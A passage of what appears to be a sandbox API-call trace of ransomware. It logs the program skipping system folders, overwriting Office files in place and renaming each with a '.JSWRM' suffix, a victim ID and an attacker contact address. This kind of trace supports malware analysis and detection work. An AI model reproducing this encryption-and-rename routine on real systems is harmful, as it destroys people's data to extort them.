(HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0114.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.224] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0114.224] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0114.224] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0114.224] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0114.224] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0114.224] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0114.224] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0114.224] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\INSTLIST.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\instlist.vrd"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\INSTLIST.VRD.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\instlist.vrd.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.225] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0114.225] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0114.225] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0114.225] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4665beb, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4665beb, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4665beb, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x332, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="INVENTRY.VRD", cAlternateFileName="")) returned 1 [0114.225] lstrcmpiW (lpString1="INVENTRY.VRD", lpString2=".") returned 1 [0114.225] lstrcmpiW (lpString1="INVENTRY.VRD", lpString2="..") returned 1 [0114.225] lstrcmpiW (lpString1="INVENTRY.VRD", lpString2="...") returned 1 [0114.225] lstrcmpiW (lpString1="INVENTRY.VRD", lpString2="windows") returned -1 [0114.225] lstrcmpiW (lpString1="INVENTRY.VRD", lpString2="recovery") returned -1 [0114.225] lstrcmpiW (lpString1="INVENTRY.VRD", lpString2="perflogs") returned -1 [0114.225] lstrcmpiW (lpString1="INVENTRY.VRD", lpString2="documents and settings") returned 1 [0114.225] lstrcmpiW (lpString1="INVENTRY.VRD", lpString2="$RECYCLE.BIN") returned 1 [0114.225] lstrcmpiW (lpString1="INVENTRY.VRD", lpString2="system volume information") returned -1 [0114.225] lstrcmpiW (lpString1="INVENTRY.VRD", lpString2="msocache") returned -1 [0114.225] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0114.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INVENTRY.VRD", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0114.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INVENTRY.VRD", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="INVENTRY.VRD", lpUsedDefaultChar=0x0) returned 12 [0114.225] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0114.225] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0114.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INVENTRY.VRD", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0114.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INVENTRY.VRD", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="INVENTRY.VRD", lpUsedDefaultChar=0x0) returned 12 [0114.225] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0114.225] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0114.225] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0114.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0114.226] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\INVENTRY.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\inventry.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.226] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=818) returned 1 [0114.226] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x330) returned 0x20b1f8 [0114.226] ReadFile (in: hFile=0x238, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x330, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x330, lpOverlapped=0x0) returned 1 [0114.228] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.228] WriteFile (in: hFile=0x238, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x330, lpOverlapped=0x0) returned 1 [0114.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0114.228] CloseHandle (hObject=0x238) returned 1 [0114.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0114.228] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.228] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0114.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.228] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0114.228] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0114.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0114.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0114.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0114.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0114.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0114.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0114.228] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\INVENTRY.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\inventry.vrd"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\INVENTRY.VRD.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\inventry.vrd.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.229] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0114.229] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0114.229] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0114.229] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9a2c10c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9a2c10c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9ac4a8a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2bc8, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="Invite or Link.one", cAlternateFileName="INVITE~1.ONE")) returned 1 [0114.229] lstrcmpiW (lpString1="Invite or Link.one", lpString2=".") returned 1 [0114.229] lstrcmpiW (lpString1="Invite or Link.one", lpString2="..") returned 1 [0114.229] lstrcmpiW (lpString1="Invite or Link.one", lpString2="...") returned 1 [0114.229] lstrcmpiW (lpString1="Invite or Link.one", lpString2="windows") returned -1 [0114.229] lstrcmpiW (lpString1="Invite or Link.one", lpString2="recovery") returned -1 [0114.229] lstrcmpiW (lpString1="Invite or Link.one", lpString2="perflogs") returned -1 [0114.230] lstrcmpiW (lpString1="Invite or Link.one", lpString2="documents and settings") returned 1 [0114.230] lstrcmpiW (lpString1="Invite or Link.one", lpString2="$RECYCLE.BIN") returned 1 [0114.230] lstrcmpiW (lpString1="Invite or Link.one", lpString2="system volume information") returned -1 [0114.230] lstrcmpiW (lpString1="Invite or Link.one", lpString2="msocache") returned -1 [0114.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Invite or Link.one", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0114.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0114.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Invite or Link.one", cchWideChar=18, lpMultiByteStr=0x240f48, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Invite or Link.one", lpUsedDefaultChar=0x0) returned 18 [0114.230] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Invite or Link.one", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0114.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0114.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Invite or Link.one", cchWideChar=18, lpMultiByteStr=0x2410d8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Invite or Link.one", lpUsedDefaultChar=0x0) returned 18 [0114.230] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0114.230] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0114.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0114.230] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\Invite or Link.one" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\invite or link.one"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.231] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11208) returned 1 [0114.231] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.231] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bc0) returned 0x24c1d0 [0114.232] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x2bc0, lpOverlapped=0x0) returned 1 [0114.234] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.234] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x2bc0, lpOverlapped=0x0) returned 1 [0114.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0114.234] CloseHandle (hObject=0x238) returned 1 [0114.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0114.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0114.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0114.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0114.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0114.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0114.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0114.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0114.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0114.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0114.234] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\Invite or Link.one" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\invite or link.one"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\Invite or Link.one.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\invite or link.one.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0114.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0114.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0114.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0114.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0114.235] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4665beb, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4665beb, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4665beb, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xd7a, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="JADE.CSS", cAlternateFileName="")) returned 1 [0114.235] lstrcmpiW (lpString1="JADE.CSS", lpString2=".") returned 1 [0114.235] lstrcmpiW (lpString1="JADE.CSS", lpString2="..") returned 1 [0114.235] lstrcmpiW (lpString1="JADE.CSS", lpString2="...") returned 1 [0114.235] lstrcmpiW (lpString1="JADE.CSS", lpString2="windows") returned -1 [0114.235] lstrcmpiW (lpString1="JADE.CSS", lpString2="recovery") returned -1 [0114.235] lstrcmpiW (lpString1="JADE.CSS", lpString2="perflogs") returned -1 [0114.235] lstrcmpiW (lpString1="JADE.CSS", lpString2="documents and settings") returned 1 [0114.235] lstrcmpiW (lpString1="JADE.CSS", lpString2="$RECYCLE.BIN") returned 1 [0114.235] lstrcmpiW (lpString1="JADE.CSS", lpString2="system volume information") returned -1 [0114.235] lstrcmpiW (lpString1="JADE.CSS", lpString2="msocache") returned -1 [0114.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0114.236] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JADE.CSS", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0114.236] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JADE.CSS", cchWideChar=8, lpMultiByteStr=0x345ebd8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JADE.CSS", lpUsedDefaultChar=0x0) returned 8 [0114.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0114.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0114.236] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JADE.CSS", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0114.236] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JADE.CSS", cchWideChar=8, lpMultiByteStr=0x345eba8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JADE.CSS", lpUsedDefaultChar=0x0) returned 8 [0114.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0114.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0114.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0114.236] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.236] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224cc8 [0114.236] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\JADE.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\jade.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.236] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3450) returned 1 [0114.237] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.237] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd70) returned 0x206858 [0114.237] ReadFile (in: hFile=0x238, lpBuffer=0x206858, nNumberOfBytesToRead=0xd70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xd70, lpOverlapped=0x0) returned 1 [0114.312] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.312] WriteFile (in: hFile=0x238, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xd70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xd70, lpOverlapped=0x0) returned 1 [0114.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0114.312] CloseHandle (hObject=0x238) returned 1 [0114.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0114.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0114.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0114.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0114.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0114.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0114.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0114.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0114.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0114.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0114.313] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\JADE.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\jade.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\JADE.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\jade.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0114.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: 